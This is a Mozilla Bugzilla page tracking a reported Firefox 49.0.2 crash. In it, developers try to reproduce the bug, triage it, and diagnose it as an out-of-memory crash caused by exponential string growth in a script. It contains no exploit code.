Summary: Mozilla Firefox 49.0.2 - Denial of Service → Mozilla Firefox 49.0.2 - crash-buffer some tools
|
||
Comment 3•9 years ago
|
||
Did you get a Firefox crash dialog, and did you submit the crash to us? That would have information in a useful form for us. You can find the crash links (if you did so) by opening the page about:crashes
Group: firefox-core-security → core-security
Component: Activity Streams: Application Servers → General
Flags: needinfo?(sultanalbalawi00)
Flags: needinfo?(dveditz)
Product: Firefox → Core
|
||
Comment 4•9 years ago
|
||
Added the decoded test case. No luck reproducing this thought.
|
||
Comment 5•9 years ago
|
||
FYI, unable to reproduce on Mac, latest release 49.0.2 and Nightly 52.
|
|
Reporter | |
Comment 6•9 years ago
|
||
(In reply to Daniel Veditz [:dveditz] from comment #3)
> Did you get a Firefox crash dialog, and did you submit the crash to us? That
> would have information in a useful form for us. You can find the crash links
> (if you did so) by opening the page about:crashes
This is a problem in the program Why do not you treat this matter in the future and placed restrictions on JavaScript codes
thanks
|
||
Updated•9 years ago
|
Component: General → Untriaged
|
|
||
Updated•9 years ago
|
Group: core-security → dom-core-security
|
|
||
Comment 7•9 years ago
|
||
I can reproduce in a 32-bit build on Win7
bp-55908f00-fb04-4f13-a8f3-ad5f92161110
It's an intentional out-of-memory crash due to the exponential string growth. It's essentially a dupe of similar PoC's we see, crashing in a slightly different place but for the same reason. It would be friendlier to throw an exception in the script context than to crash everything, though the coming multi-process builds turns this into a less-painful crash for just the abusive tab rather than everything.
Group: dom-core-security
Status: UNCONFIRMED → NEW
Crash Signature: [@ OOM | unknown | NS_ABORT_OOM | nsContentUtils::GetNodeTextContent ]
Component: Untriaged → DOM
Ever confirmed: true
Flags: needinfo?(sultanalbalawi00)
Flags: needinfo?(dveditz)
Whiteboard: [sg:dos]
|
||
Updated•9 years ago
|
Priority: -- → P3
|
Assignee | |
Updated•6 years ago
|
Component: DOM → DOM: Core & HTML
|
||
Updated•3 years ago
|
Severity: normal → S3
You need to log in
before you can comment on or make changes to this bug.
Description
•